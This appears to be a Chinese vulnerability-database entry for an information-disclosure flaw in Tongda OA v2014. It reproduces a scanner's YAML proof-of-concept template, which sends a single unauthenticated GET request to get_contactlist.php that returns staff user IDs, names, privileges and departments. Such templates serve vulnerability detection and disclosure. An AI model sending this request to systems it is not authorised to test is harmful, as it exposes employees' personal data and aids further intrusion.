tongda-contact-list-disclosure: 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞

日期: 2025-09-01 | 影响软件: 通达OA | POC: 已公开

漏洞描述

通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击 app="TDXK-通达OA"

PoC代码[已公开]

id: tongda-contact-list-disclosure

info:
  name: 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击
    app="TDXK-通达OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2014%20get_contactlist.php%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
    expression: response.status == 200 && response.body.bcontains(b'"user_uid":') && response.body.bcontains(b'"user_name":') && response.body.bcontains(b'"priv_name":') && response.body.bcontains(b'"dept_name":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml

相关漏洞推荐